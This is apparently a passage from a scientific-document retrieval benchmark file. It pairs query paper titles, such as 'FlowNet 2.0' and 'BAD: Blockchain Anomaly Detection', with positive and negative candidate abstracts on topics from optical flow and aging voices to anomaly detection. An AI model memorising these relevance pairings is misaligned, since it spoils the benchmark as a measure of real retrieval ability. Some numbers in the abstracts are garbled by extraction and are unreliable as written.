"text": "In the near future, new storage-class memory (SCM) technologies -- such as phase-change memory and memristors -- will radically change the nature of long-term storage. These devices will be cheap, non-volatile, byte addressable, and near DRAM density and speed. While SCM offers enormous opportunities, profiting from them will require new storage systems specifically designed for SCM's properties.\n This paper presents Echo, a persistent key-value storage system designed to leverage the advantages and address the challenges of SCM. The goals of Echo include high performance for both small and large data objects, recoverability after failure, and scalability on multicore systems. Echo achieves its goals through the use of a two-level memory design targeted for memory systems containing both DRAM and SCM, exploitation of SCM's byte addressability for fine-grained transactions in non-volatile memory, and the use of snapshot isolation for concurrency, consistency, and versioning. Our evaluation demonstrates that Echo's SCM-centric design achieves the durability guarantees of the best disk-based stores with the performance characteristics approaching the best in-memory key-value stores.",
"title": ""
},
{
"docid": "7e6474de31f7d9cdee552a50a09bbeae",
"text": "BACKGROUND Demographics in America are beginning to shift toward an older population, with the number of patients aged 65 years or older numbering approximately 41.4 million in 2011, which represents an increase of 18% since 2000. Within the aging population, the incidence of vocal disorders is estimated to be between 12% and 35%. In a series reported by Davids et al., 25% of patients over age 65 years presenting with a voice complaint were found to have vocal fold atrophy (presbylarynges), where the hallmark physical signs are vocal fold bowing with an increased glottic gap and prominent vocal processes. The epithelial and lamina propria covering of the vocal folds begin to exhibit changes due to aging. In older adults, the collagen of the vocal folds lose their “wicker basket” type of organization, which leads to more disarrayed segments throughout all the layers of the lamina propria, and there is also a loss of hyaluronic acid and elastic fibers. With this loss of the viscoelastic properties and subsequent vocal fold thinning, along with thyroarytenoid muscle atrophy, this leads to the classic bowed membranous vocal fold. Physiologically, these anatomical changes to the vocal folds leads to incomplete glottal closure, air escape, changes in vocal fold tension, altered fundamental frequency, and decreased vocal endurance. Women’s voices will often become lower pitched initially and then gradually higher pitched and shrill, whereas older men’s voices will gradually become more high pitched as the vocal folds lengthen to try and achieve approximation. LITERATURE REVIEW The literature documents that voice therapy is a useful tool in the treatment of presbyphonia and improves voice-related quality of life. The goal of therapy is based on a causal model that suggests targeting the biological basis of the condition—degenerative respiratory and laryngeal changes—as a result of sarcopenia. Specifically, the voice therapy protocol should capitalize on high-intensity phonatory exercises to overload the respiratory and laryngeal system and improve vocal loudness, reduce vocal effort, and increase voice-related quality of life (VRQoL). In a small prospective, randomized, controlled trial, Ziegler et al. demonstrated that patients with vocal atrophy undergoing therapy—phonation resistance training exercise (PhoRTE) or vocal function exercise (VFE)—had a significantly improved VRQoL score preand post-therapy (88.5–95.0, P 5.049 for PhoRTE and 80.8–87.5, P 5.054 for VFE), whereas patients in the nonintervention group saw no improvement (87.5–91.5, P 5.70). Patients in the PhoRTE group exhibited a significant decrease in perceived phonatory effort, but not patients undergoing VFE or no therapy. Injection laryngoplasty (IL), initially developed for restoration of glottic competence in vocal fold paralysis, has also been increasingly used in treatment of the aging voice. A number of materials have been used over the years including Teflon, silicone, fat, Gelfoam, collagen, hyaluronic acid, carboxymethylcellulose, and calcium hydroxylapatite. Some of these are limited by safety or efficacy concerns, and some of them are not long lasting. With the growing use of in-office IL, the ease of use has made this technique more popular because of the ability to avoid general anesthesia in a sometimes already frail patient population. Davids et al. also examined changes in VRQoL scores for patients undergoing IL and demonstrated a significant improvement preand post-therapy (34.8 vs. 22, P<.0001). 
Due to a small sample size, however, the authors were unable to make any direct comparisons between patients undergoing voice therapy versus IL. Medialization thyroplasty (MT) remains as the otolaryngologist’s permanent technique for addressing the glottal insufficiency found in the aging larynx. In the same fashion as IL, the technique developed as a way to address the paralytic vocal fold and can use either Silastic or Gore-Tex implants. Postma et al. looked at the From the Emory Voice Center, Department of Otolaryngology/ Head and Neck Surgery, Emory University School of Medicine, Atlanta, Georgia, U.S.A. This work was performed at the Emory Voice Center in the Department of Otolaryngology/Head and Neck Surgery at the Emory School of Medicine in Atlanta, Georgia. This work was funded internally by the Emory Voice Center. The authors have no other funding, financial relationships, or conflicts of interest to disclose. Joseph Bradley has worked as a consultant for Merz Aesthetics teaching a vocal fold injection laryngoplasty course. Send correspondence to Michael M. Johns, III, MD, Emory University School of Medicine, 550 Peachtree St. NE, 9th Floor, Suite 4400, Atlanta, GA 30308. E-mail: michael.johns2@emory.edu",
"title": ""
},
{
"docid": "072b6e69c0d0e277bf7fd679f31085f6",
"text": "A strip curl antenna is investigated for obtaining a circularly-polarized (CP) tilted beam. This curl is excited through a strip line (called the excitation line) that connects the curl arm to a coaxial feed line. The antenna structure has the following features: a small circumference not exceeding two wavelengths and a small antenna height of less than 0.42 wavelength. The antenna arm is printed on a dielectric hollow cylinder, leading to a robust structure. The investigation reveals that an external excitation for the curl using a straight line (ST-line) is more effective for generating a tilted beam than an internal excitation. It is found that the axial ratio of the radiation field from the external-excitation curl is improved by transforming the ST-line into a wound line (WD-line). It is also found that a modification to the end area of the WD-line leads to an almost constant input impedance (50 ohms). Note that these results are demonstrated for the Ku-band (from 11.7 GHz to 12.75 GHz, 8.6% bandwidth).",
"title": ""
},
{
"docid": "4c877ad8e2f8393526514b12ff992ca0",
"text": "The squared-field-derivative method for calculating eddy-current (proximity-effect) losses in round-wire or litz-wire transformer and inductor windings is derived. The method is capable of analyzing losses due to two-dimensional and three-dimensional field effects in multiple windings with arbitrary waveforms in each winding. It uses a simple set of numerical magnetostatic field calculations, which require orders of magnitude less computation time than numerical eddy-current solutions, to derive a frequency-independent matrix describing the transformer or inductor. This is combined with a second, independently calculated matrix, based on derivatives of winding currents, to compute total ac loss. Experiments confirm the accuracy of the method.",
"title": ""
}
] | scidocsrr |
05981dbb5109ce73f049329388593e57 | FlowNet 2.0: Evolution of Optical Flow Estimation with Deep Networks | [
{
"docid": "f1deb9134639fb8407d27a350be5b154",
"text": "This work introduces a novel Convolutional Network architecture for the task of human pose estimation. Features are processed across all scales and consolidated to best capture the various spatial relationships associated with the body. We show how repeated bottom-up, top-down processing used in conjunction with intermediate supervision is critical to improving the performance of the network. We refer to the architecture as a ‘stacked hourglass’ network based on the successive steps of pooling and upsampling that are done to produce a final set of estimates. State-of-the-art results are achieved on the FLIC and MPII benchmarks outcompeting all recent methods.",
"title": ""
},
{
"docid": "6960f780dfc491c6cdcbb6c53fd32363",
"text": "We learn to compute optical flow by combining a classical spatial-pyramid formulation with deep learning. This estimates large motions in a coarse-to-fine approach by warping one image of a pair at each pyramid level by the current flow estimate and computing an update to the flow. Instead of the standard minimization of an objective function at each pyramid level, we train one deep network per level to compute the flow update. Unlike the recent FlowNet approach, the networks do not need to deal with large motions, these are dealt with by the pyramid. This has several advantages. First, our Spatial Pyramid Network (SPyNet) is much simpler and 96% smaller than FlowNet in terms of model parameters. This makes it more efficient and appropriate for embedded applications. Second, since the flow at each pyramid level is small (",
"title": ""
},
{
"docid": "eadc50aebc6b9c2fbd16f9ddb3094c00",
"text": "Instance segmentation is the problem of detecting and delineating each distinct object of interest appearing in an image. Current instance segmentation approaches consist of ensembles of modules that are trained independently of each other, thus missing opportunities for joint learning. Here we propose a new instance segmentation paradigm consisting in an end-to-end method that learns how to segment instances sequentially. The model is based on a recurrent neural network that sequentially finds objects and their segmentations one at a time. This net is provided with a spatial memory that keeps track of what pixels have been explained and allows occlusion handling. In order to train the model we designed a principled loss function that accurately represents the properties of the instance segmentation problem. In the experiments carried out, we found that our method outperforms recent approaches on multiple person segmentation, and all state of the art approaches on the Plant Phenotyping dataset for leaf counting.",
"title": ""
}
] | [
{
"docid": "fc12de539644b1b2cf2406708e13e1e0",
"text": "Nonlinear principal component analysis is a novel technique for multivariate data analysis, similar to the well-known method of principal component analysis. NLPCA, like PCA, is used to identify and remove correlations among problem variables as an aid to dimensionality reduction, visualization, and exploratory data analysis. While PCA identifies only linear correlations between variables, NLPCA uncovers both linear and nonlinear correlations, without restriction on the character of the nonlinearities present in the data. NLPCA operates by training a feedforward neural network to perform the identity mapping, where the network inputs are reproduced at the output layer. The network contains an internal “bottleneck” layer (containing fewer nodes than input or output layers), which forces the network to develop a compact representation of the input data, and two additional hidden layers. The NLPCA method is demonstrated using time-dependent, simulated batch reaction data. Results show that NLPCA successfully reduces dimensionality and produces a feature space map resembling the actual distribution of the underlying system parameters.",
"title": ""
},
{
"docid": "ffc239273a5e911dcc59559ef7c2c7f8",
"text": "Human-dominated marine ecosystems are experiencing accelerating loss of populations and species, with largely unknown consequences. We analyzed local experiments, long-term regional time series, and global fisheries data to test how biodiversity loss affects marine ecosystem services across temporal and spatial scales. Overall, rates of resource collapse increased and recovery potential, stability, and water quality decreased exponentially with declining diversity. Restoration of biodiversity, in contrast, increased productivity fourfold and decreased variability by 21%, on average. We conclude that marine biodiversity loss is increasingly impairing the ocean's capacity to provide food, maintain water quality, and recover from perturbations. Yet available data suggest that at this point, these trends are still reversible.",
"title": ""
},
{
"docid": "0f89f98d8db9667e24f23466c2e37d8a",
"text": "With the increase in the elderly, stroke has become a common disease, often leading to motor dysfunction and even permanent disability. Lower-limb rehabilitation robots can help patients to carry out reasonable and effective training to improve the motor function of paralyzed extremity. In this paper, the developments of lower-limb rehabilitation robots in the past decades are reviewed. Specifically, we provide a classification, a comparison, and a design overview of the driving modes, training paradigm, and control strategy of the lower-limb rehabilitation robots in the reviewed literature. A brief review on the gait detection technology of lower-limb rehabilitation robots is also presented. Finally, we discuss the future directions of the lower-limb rehabilitation robots.",
"title": ""
},
{
"docid": "c3fcc103374906a1ba21658c5add67fe",
"text": "Behavioural scoring models are generally used to estimate the probability that a customer of a financial institution who owns a credit product will default on this product in a fixed time horizon. However, one single customer usually purchases many credit products from an institution while behavioural scoring models generally treat each of these products independently. In order to make credit risk management easier and more efficient, it is interesting to develop customer default scoring models. These models estimate the probability that a customer of a certain financial institution will have credit issues with at least one product in a fixed time horizon. In this study, three strategies to develop customer default scoring models are described. One of the strategies is regularly utilized by financial institutions and the other two will be proposed herein. The performance of these strategies is compared by means of an actual data bank supplied by a financial institution and a Monte Carlo simulation study. Journal of the Operational Research Society advance online publication, 20 April 2016; doi:10.1057/jors.2016.23",
"title": ""
},
{
"docid": "55c4f9f95067ce80bee9a51196f27e85",
"text": "Resilient localization and navigation for autonomous Unmanned Aerial Vehicles (UAVs) still remains a challenge in certain scenarios, like GPS-deprived environments such as indoors or urban canyons. In this work, we explore a heterogeneous UAV swarm design, in which a small number of sensor and computationally powerful UAVs collaborate with the remaining resource-constrained UAVs to guarantee optimal localization accuracy.",
"title": ""
},
{
"docid": "85db35ffe69ce2a8d042c8c068ddaf15",
"text": "Conventional views on marriage migration consider it primarily family-related, and portray female marriage migrants as mostly passive, tied movers. Marriage as an economic strategy is seldom studied. We argue that a structural framework enables analysis of the complexities underlying female marriage migration, stressing institutional, economic, and sociocultural factors that impose constraints on and provide opportunities for women’s mobility. A review of the historical and social roles of marriage in China shows that its transactional nature undermines women’s status but offers disadvantaged women an opportunity to achieve social and economic mobility. Based on statistical analyses of a one-percent sample of China’s 1990 Census, we show that peasant women in poor areas are constrained by their institutional positions, rural origins, and low education and status, shutting them out from cities and the urban labor market. Yet in the face of these constraints, many women, in exchange for economic opportunities and agricultural work, pursue migration by marrying into rural areas in more developed regions and by moving over long distances. These rural brides in well-defined migration streams are testimony to the roles of social and kinship networks and of brokers in the marriage market. Men who are socially and/or economically disadvantaged but locationally privileged are able to draw brides from afar. Despite the neoclassical overtone of the notion that marriage migration is an economic strategy, we argue that a structural approach is necessary for understanding the complexities underlying female migration and for explaining the recent phenomenon of long-distance female marriage migration in China.",
"title": ""
},
{
"docid": "281fe7b4b26ead35e7ce0d2ea354f002",
"text": "BACKGROUND\nThe safety and the effects of different trajectories on thumb motion of suture-button suspensionplasty post-trapeziectomy are not known.\n\n\nMETHODS\nIn a cadaveric model, thumb range of motion, trapeziectomy space height, and distance between the device and nerve to the first dorsal interosseous muscle (first DI) were measured for proximal and distal trajectory groups. Proximal trajectory was defined as a suture button angle directed from the thumb metacarpal to the second metacarpal at a trajectory less than 60° from the horizontal; distal trajectory was defined as a suture button angle directed from the thumb metacarpal to the second metacarpal at a trajectory of greater than 60° from the horizontal (Fig. 1).\n\n\nRESULTS\nThere were no significant differences in range of motion and trapeziectomy space height between both groups. The device was significantly further away from the nerve to the first DI in the proximal trajectory group compared to the distal trajectory group, but was still safely away from the nerve in both groups (greater than 1 cm).\n\n\nCONCLUSIONS\nThese results suggest that the device placement in either a proximal or distal location on the second metacarpal will yield similar results regarding safety and thumb range of motion.",
"title": ""
},
{
"docid": "146746c73471d0a4222267e819c79e85",
"text": "Distributed Generation has become a consolidated phenomenon in distribution grids in the last few years. Even though the matter is very articulated and complex, islanding operation of distribution grid is being considered as a possible measure to improve service continuity. In this paper a novel static converter control strategy to obtain frequency and voltage regulation in islanded distribution grid is proposed. Two situations are investigated: in the former one electronic converter and one synchronous generator are present, while in the latter only static generation is available. In both cases, converters are supposed to be powered by DC micro-grids comprising of generation and storage devices. In the first case converter control will realize virtual inertia and efficient frequency regulation by mean of PID regulator; this approach allows to emulate a very high equivalent inertia and to obtain fast frequency regulation, which could not be possible with traditional regulators. In the second situation a Master-Slave approach will be adopted to maximize frequency and voltage stability. Simulation results confirm that the proposed control allows islanded operation with high frequency and voltage stability under heavy load variations.",
"title": ""
},
{
"docid": "667397dd9d08d01d0076e54cb719b942",
"text": "It is known that secure multi-party computations can be achieved using a number of black and red physical cards (with identical backs). In previous studies on such card-based cryptographic protocols, typically an ideal situation where all players are semi-honest and all cards of the same suit are indistinguishable from one another was assumed. In this paper, we consider more realistic situations where, for example, some players possibly act maliciously, or some cards possibly have scuff marks, so that they are distinguishable, and propose methods to maintain the secrecy of players’ private inputs even under such severe conditions.",
"title": ""
},
{
"docid": "0edc89fbf770bbab2fb4d882a589c161",
"text": "A calculus is developed in this paper (Part I) and the sequel (Part 11) for obtaining bounds on delay and buffering requirements in a communication network operating in a packet switched mode under a fixed routing strategy. The theory we develop is different from traditional approaches to analyzing delay because the model we use to describe the entry of data into the network is nonprobabilistic: We suppose that the data stream entered intq the network by any given user satisfies “burstiness constraints.” A data stream is said to satisfy a burstiness constraint if the quantity of data from the stream contained in any interval of time is less than a value that depends on the length of the interval. Several network elements are defined that can be used as building blocks to model a wide variety of communication networks. Each type of network element is analyzed by assuming that the traffic entering it satisfies burstiness constraints. Under this assumption bounds are obtained on delay and buffering requirements for the network element, burstiness constraints satisfied by the traffic that exits the element are derived. Index Terms -Queueing networks, burstiness, flow control, packet switching, high speed networks.",
"title": ""
},
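Note on the burstiness-calculus passage above (docid 0edc89fb…): a small sketch of what a (sigma, rho) burstiness constraint means in code, together with the classic single-flow backlog and delay bounds for a work-conserving constant-rate server; the numeric values are made up, and the bounds quoted are standard network-calculus results rather than the specific bounds derived in the paper.

```python
from dataclasses import dataclass

@dataclass
class SigmaRho:
    """Burstiness constraint: A(t) - A(s) <= sigma + rho * (t - s) for all s <= t."""
    sigma: float  # burst allowance (bits)
    rho: float    # sustainable long-term rate (bits per second)

def satisfies(arrivals, constraint, dt=1.0):
    """Check a sampled arrival sequence (bits per slot of length dt seconds)
    against a (sigma, rho) constraint by testing every interval [s, t]."""
    cum = [0.0]
    for a in arrivals:
        cum.append(cum[-1] + a)
    for s in range(len(arrivals) + 1):
        for t in range(s, len(arrivals) + 1):
            if cum[t] - cum[s] > constraint.sigma + constraint.rho * (t - s) * dt + 1e-9:
                return False
    return True

def fifo_bounds(constraint, service_rate):
    """Classic single-flow bounds for a work-conserving server of rate C >= rho:
    backlog <= sigma, delay <= sigma / C."""
    assert service_rate >= constraint.rho, "server must keep up with the long-term rate"
    return {"max_backlog_bits": constraint.sigma,
            "max_delay_s": constraint.sigma / service_rate}

c = SigmaRho(sigma=12_000.0, rho=1_000.0)            # 12 kbit burst, 1 kbit/s sustained
print(satisfies([5000, 0, 0, 2000, 500, 500], c))    # True: stays under the envelope
print(satisfies([9000, 9000, 0, 0, 0, 0], c))        # False: 18 kbit in ~1 s exceeds it
print(fifo_bounds(c, service_rate=2_000.0))
```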
{
"docid": "792767dee5fb0251f0ff028c75d6e55a",
"text": "According to a recent theory, anterior cingulate cortex is sensitive to response conflict, the coactivation of mutually incompatible responses. The present research develops this theory to provide a new account of the error-related negativity (ERN), a scalp potential observed following errors. Connectionist simulations of response conflict in an attentional task demonstrated that the ERN--its timing and sensitivity to task parameters--can be explained in terms of the conflict theory. A new experiment confirmed predictions of this theory regarding the ERN and a second scalp potential, the N2, that is proposed to reflect conflict monitoring on correct response trials. Further analysis of the simulation data indicated that errors can be detected reliably on the basis of post-error conflict. It is concluded that the ERN can be explained in terms of response conflict and that monitoring for conflict may provide a simple mechanism for detecting errors.",
"title": ""
},
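Note on the conflict-monitoring passage above (docid 792767de…): in this literature, response conflict is commonly operationalized as the Hopfield energy of the response layer; the snippet computes that quantity for a two-unit layer with mutual inhibition, with purely illustrative activation values and weights.

```python
import numpy as np

def response_conflict(activations, weights):
    """Hopfield-energy style conflict: -sum_{i<j} w_ij * a_i * a_j.
    With mutually inhibitory (negative) weights, coactivation of two
    incompatible responses yields a positive conflict signal."""
    a = np.asarray(activations, dtype=float)
    w = np.asarray(weights, dtype=float)
    energy = 0.0
    for i in range(len(a)):
        for j in range(i + 1, len(a)):
            energy += w[i, j] * a[i] * a[j]
    return -energy

# Two incompatible responses linked by mutual inhibition (illustrative values).
w = np.array([[0.0, -1.0],
              [-1.0, 0.0]])
print(response_conflict([0.9, 0.1], w))  # mostly one response active -> low conflict
print(response_conflict([0.7, 0.6], w))  # both coactive (error-prone trial) -> high conflict
```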
{
"docid": "ea5a455bca9ff0dbb1996bd97d89dfe5",
"text": "Single exon genes (SEG) are archetypical of prokaryotes. Hence, their presence in intron-rich, multi-cellular eukaryotic genomes is perplexing. Consequently, a study on SEG origin and evolution is important. Towards this goal, we took the first initiative of identifying and counting SEG in nine completely sequenced eukaryotic organisms--four of which are unicellular (E. cuniculi, S. cerevisiae, S. pombe, P. falciparum) and five of which are multi-cellular (C. elegans, A. thaliana, D. melanogaster, M. musculus, H. sapiens). This exercise enabled us to compare their proportion in unicellular and multi-cellular genomes. The comparison suggests that the SEG fraction decreases with gene count (r = -0.80) and increases with gene density (r = 0.88) in these genomes. We also examined the distribution patterns of their protein lengths in different genomes.",
"title": ""
},
{
"docid": "425fb8419a81531e9f5ce3da96155d93",
"text": "This paper presents the challenges that researchers must overcome in traffic light recognition (TLR) research and provides an overview of ongoing work. The aim is to elucidate which areas have been thoroughly researched and which have not, thereby uncovering opportunities for further improvement. An overview of the applied methods and noteworthy contributions from a wide range of recent papers is presented, along with the corresponding evaluation results. The evaluation of TLR systems is studied and discussed in depth, and we propose a common evaluation procedure, which will strengthen evaluation and ease comparison. To provide a shared basis for comparing TLR systems, we publish an extensive public data set based on footage from U.S. roads. The data set contains annotated video sequences, captured under varying light and weather conditions using a stereo camera. The data set, with its variety, size, and continuous sequences, should challenge current and future TLR systems.",
"title": ""
},
{
"docid": "19b537f7356da81830c8f7908af83669",
"text": "Investigation of the hippocampus has historically focused on computations within the trisynaptic circuit. However, discovery of important anatomical and functional variability along its long axis has inspired recent proposals of long-axis functional specialization in both the animal and human literatures. Here, we review and evaluate these proposals. We suggest that various long-axis specializations arise out of differences between the anterior (aHPC) and posterior hippocampus (pHPC) in large-scale network connectivity, the organization of entorhinal grid cells, and subfield compositions that bias the aHPC and pHPC towards pattern completion and separation, respectively. The latter two differences give rise to a property, reflected in the expression of multiple other functional specializations, of coarse, global representations in anterior hippocampus and fine-grained, local representations in posterior hippocampus.",
"title": ""
},
{
"docid": "aeec3b7e79225355a5a6ff10f9c3e4ea",
"text": "BACKGROUND\nCritically ill patients frequently suffer muscle weakness whilst in critical care. Ultrasound can reliably track loss of muscle size, but also quantifies the arrangement of the muscle fascicles, known as the muscle architecture. We sought to measure both pennation angle and fascicle length, as well as tracking changes in muscle thickness in a population of critically ill patients.\n\n\nMETHODS\nOn days 1, 5 and 10 after admission to critical care, muscle thickness was measured in ventilated critically ill patients using bedside ultrasound. Elbow flexor compartment, medial head of gastrocnemius and vastus lateralis muscle were investigated. In the lower limb, we determined the pennation angle to derive the fascicle length.\n\n\nRESULTS\nWe recruited and scanned 22 patients on day 1 after admission to critical care, 16 were re-scanned on day 5 and 9 on day 10. We found no changes to the size of the elbow flexor compartment over 10 days of admission. In the gastrocnemius, there were no significant changes to muscle thickness or pennation angle over 5 or 10 days. In the vastus lateralis, we found significant losses in both muscle thickness and pennation angle on day 5, but found that fascicle length is unchanged. Loss of muscle on day 5 was related to decreases in pennation angle. In both lower limb muscles, a positive relationship was observed between the pennation angle on day 1, and the percentage of angle lost by days 5 and 10.\n\n\nDISCUSSION\nMuscle loss in critically ill patients preferentially affects the lower limb, possibly due to the lower limb becoming prone to disuse atrophy. Muscle architecture of the thigh changes in the first 5 days of admission, in particular, we have demonstrated a correlation between muscle thickness and pennation angle. It is hypothesised that weakness in the lower limb occurs through loss of force generation via a reduced pennation angle.\n\n\nCONCLUSION\nUsing ultrasound, we have been able to demonstrate that muscle thickness and architecture of vastus lateralis undergo rapid changes during the early phase of admission to a critical care environment.",
"title": ""
},
{
"docid": "fe38b44457f89bcb63aabe65babccd03",
"text": "Single sample face recognition have become an important problem because of the limitations on the availability of gallery images. In many real-world applications such as passport or driver license identification, there is only a single facial image per subject available. The variations between the single gallery face image and the probe face images, captured in unconstrained environments, make the single sample face recognition even more difficult. In this paper, we present a fully automatic face recognition system robust to most common face variations in unconstrained environments. Our proposed system is capable of recognizing faces from non-frontal views and under different illumination conditions using only a single gallery sample for each subject. It normalizes the face images for both in-plane and out-of-plane pose variations using an enhanced technique based on active appearance models (AAMs). We improve the performance of AAM fitting, not only by training it with in-the-wild images and using a powerful optimization technique, but also by initializing the AAM with estimates of the locations of the facial landmarks obtained by a method based on flexible mixture of parts. The proposed initialization technique results in significant improvement of AAM fitting to non-frontal poses and makes the normalization process robust, fast and reliable. Owing to the proper alignment of the face images, made possible by this approach, we can use local feature descriptors, such as Histograms of Oriented Gradients (HOG), for matching. The use of HOG features makes the system robust against illumination variations. In order to improve the discriminating information content of the feature vectors, we also extract Gabor features from the normalized face images and fuse them with HOG features using Canonical Correlation Analysis (CCA). Experimental results performed on various databases outperform the state-of-the-art methods and show the effectiveness of our proposed method in normalization and recognition of face images obtained in unconstrained environments.",
"title": ""
},
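Note on the face-recognition passage above (docid fe38b444…): a sketch of the final fusion step it mentions, combining two feature views with Canonical Correlation Analysis; the random matrices stand in for real HOG and Gabor descriptors, and the dimensions, component count and matching rule are assumptions for the example.

```python
import numpy as np
from sklearn.cross_decomposition import CCA

rng = np.random.default_rng(0)
n_faces = 200
hog_feats = rng.normal(size=(n_faces, 128))    # stand-in for HOG descriptors
gabor_feats = rng.normal(size=(n_faces, 256))  # stand-in for Gabor magnitudes

# Project both views onto maximally correlated directions and fuse them.
cca = CCA(n_components=16, max_iter=1000)
hog_c, gabor_c = cca.fit_transform(hog_feats, gabor_feats)

# Two common fusion rules: concatenation or summation of the canonical variates.
fused_concat = np.hstack([hog_c, gabor_c])   # shape (n_faces, 32)
fused_sum = hog_c + gabor_c                  # shape (n_faces, 16)

# Matching a probe face against gallery templates with cosine similarity.
def cosine(a, b):
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b) + 1e-12))

probe, gallery = fused_concat[0], fused_concat[1:]
best = max(range(len(gallery)), key=lambda i: cosine(probe, gallery[i]))
print(fused_concat.shape, fused_sum.shape, "best gallery match:", best)
```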
{
"docid": "abf3e75c6f714e4c2e2a02f9dd00117b",
"text": "Recent work has shown that collaborative filter-based recommender systems can be improved by incorporating side information, such as natural language reviews, as a way of regularizing the derived product representations. Motivated by the success of this approach, we introduce two different models of reviews and study their effect on collaborative filtering performance. While the previous state-of-the-art approach is based on a latent Dirichlet allocation (LDA) model of reviews, the models we explore are neural network based: a bag-of-words product-of-experts model and a recurrent neural network. We demonstrate that the increased flexibility offered by the product-of-experts model allowed it to achieve state-of-the-art performance on the Amazon review dataset, outperforming the LDA-based approach. However, interestingly, the greater modeling power offered by the recurrent neural network appears to undermine the model's ability to act as a regularizer of the product representations.",
"title": ""
},
{
"docid": "488b0adfe43fc4dbd9412d57284fc856",
"text": "We describe the results of an experiment in which several conventional programming languages, together with the functional language Haskell, were used to prototype a Naval Surface Warfare Center (NSWC) requirement for a Geometric Region Server. The resulting programs and development metrics were reviewed by a committee chosen by the Navy. The results indicate that the Haskell prototype took significantly less time to develop and was considerably more concise and easier to understand than the corresponding prototypes written in several different imperative languages, including Ada and C++. ∗This work was supported by the Advanced Research Project Agency and the Office of Naval Research under Arpa Order 8888, Contract N00014-92-C-0153.",
"title": ""
},
{
"docid": "6eca7ba1607a1d7d6697af6127a92c4b",
"text": "Cluster analysis is one of attractive data mining technique that use in many fields. One popular class of data clustering algorithms is the center based clustering algorithm. K-means used as a popular clustering method due to its simplicity and high speed in clustering large datasets. However, K-means has two shortcomings: dependency on the initial state and convergence to local optima and global solutions of large problems cannot found with reasonable amount of computation effort. In order to overcome local optima problem lots of studies done in clustering. Over the last decade, modeling the behavior of social insects, such as ants and bees, for the purpose of search and problem solving has been the context of the emerging area of swarm intelligence. Honey-bees are among the most closely studied social insects. Honey-bee mating may also be considered as a typical swarm-based approach to optimization, in which the search algorithm is inspired by the process of marriage in real honey-bee. Honey-bee has been used to model agent-based systems. In this paper, we proposed application of honeybee mating optimization in clustering (HBMK-means). We compared HBMK-means with other heuristics algorithm in clustering, such as GA, SA, TS, and ACO, by implementing them on several well-known datasets. Our finding shows that the proposed algorithm works than the best one. 2007 Elsevier Inc. All rights reserved.",
"title": ""
}
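Note on the clustering passage above (docid 6eca7ba1…): the sketch below shows only the center-based K-means core that HBMK-means builds on, with random restarts standing in for the honey-bee mating search over candidate seedings; it is not the paper's algorithm.

```python
import numpy as np

def kmeans(X, k, n_iter=100, seed=0):
    """Plain Lloyd's algorithm; returns centers, labels and within-cluster SSE."""
    rng = np.random.default_rng(seed)
    centers = X[rng.choice(len(X), size=k, replace=False)].copy()
    for _ in range(n_iter):
        d = np.linalg.norm(X[:, None, :] - centers[None, :, :], axis=2)
        labels = d.argmin(axis=1)
        new_centers = np.array([X[labels == j].mean(axis=0) if np.any(labels == j)
                                else centers[j] for j in range(k)])
        if np.allclose(new_centers, centers):
            break
        centers = new_centers
    sse = float(((X - centers[labels]) ** 2).sum())
    return centers, labels, sse

rng = np.random.default_rng(1)
X = np.vstack([rng.normal(loc=m, scale=0.3, size=(100, 2)) for m in ([0, 0], [3, 3], [0, 3])])

# Random restarts stand in here for the population-based (bee-driven) search:
# each "drone" proposes a seeding, and the solution with the best SSE is kept.
best = min((kmeans(X, k=3, seed=s) for s in range(20)), key=lambda r: r[2])
print("best within-cluster SSE:", round(best[2], 3))
```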
] | scidocsrr |
90908c9174132b56d8f124ff915a3068 | BAD: Blockchain Anomaly Detection | [
{
"docid": "79798f4fbe3cffdf7c90cc5349bf0531",
"text": "When a software system starts behaving abnormally during normal operations, system administrators resort to the use of logs, execution traces, and system scanners (e.g., anti-malwares, intrusion detectors, etc.) to diagnose the cause of the anomaly. However, the unpredictable context in which the system runs and daily emergence of new software threats makes it extremely challenging to diagnose anomalies using current tools. Host-based anomaly detection techniques can facilitate the diagnosis of unknown anomalies but there is no common platform with the implementation of such techniques. In this paper, we propose an automated anomaly detection framework (Total ADS) that automatically trains different anomaly detection techniques on a normal trace stream from a software system, raise anomalous alarms on suspicious behaviour in streams of trace data, and uses visualization to facilitate the analysis of the cause of the anomalies. Total ADS is an extensible Eclipse-based open source framework that employs a common trace format to use different types of traces, a common interface to adapt to a variety of anomaly detection techniques (e.g., HMM, sequence matching, etc.). Our case study on a modern Linux server shows that Total ADS automatically detects attacks on the server, shows anomalous paths in traces, and provides forensic insights.",
"title": ""
},
{
"docid": "7e75bbbf5e86edc396aaa9d9db02c509",
"text": "Background: In recent years, blockchain technology has attracted considerable attention. It records cryptographic transactions in a public ledger that is difficult to alter and compromise because of the distributed consensus. As a result, blockchain is believed to resist fraud and hacking. Results: This work explores the types of fraud and malicious activities that can be prevented by blockchain technology and identifies attacks to which blockchain remains vulnerable. Conclusions: This study recommends appropriate defensive measures and calls for further research into the techniques for fighting malicious activities related to blockchains.",
"title": ""
},
{
"docid": "44a84af55421c88347034d6dc14e4e30",
"text": "Anomaly detection plays an important role in protecting computer systems from unforeseen attack by automatically recognizing and filter atypical inputs. However, it can be difficult to balance the sensitivity of a detector – an aggressive system can filter too many benign inputs while a conservative system can fail to catch anomalies. Accordingly, it is important to rigorously test anomaly detectors to evaluate potential error rates before deployment. However, principled systems for doing so have not been studied – testing is typically ad hoc, making it difficult to reproduce results or formally compare detectors. To address this issue we present a technique and implemented system, Fortuna, for obtaining probabilistic bounds on false positive rates for anomaly detectors that process Internet data. Using a probability distribution based on PageRank and an efficient algorithm to draw samples from the distribution, Fortuna computes an estimated false positive rate and a probabilistic bound on the estimate’s accuracy. By drawing test samples from a well defined distribution that correlates well with data seen in practice, Fortuna improves on ad hoc methods for estimating false positive rate, giving bounds that are reproducible, comparable across different anomaly detectors, and theoretically sound. Experimental evaluations of three anomaly detectors (SIFT, SOAP, and JSAND) show that Fortuna is efficient enough to use in practice — it can sample enough inputs to obtain tight false positive rate bounds in less than 10 hours for all three detectors. These results indicate that Fortuna can, in practice, help place anomaly detection on a stronger theoretical foundation and help practitioners better understand the behavior and consequences of the anomaly detectors that they deploy. As part of our work, we obtain a theoretical result that may be of independent interest: We give a simple analysis of the convergence rate of the random surfer process defining PageRank that guarantees the same rate as the standard, second-eigenvalue analysis, but does not rely on any assumptions about the link structure of the web.",
"title": ""
}
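Note on the Fortuna passage above (docid 44a84af5…): a toy version of the idea of estimating a detector's false positive rate from samples drawn under importance weights (PageRank-like here) and attaching a probabilistic bound; Hoeffding's inequality is used as one standard way to obtain such a bound, and the detector, population and weights below are made up rather than taken from the paper.

```python
import math
import random

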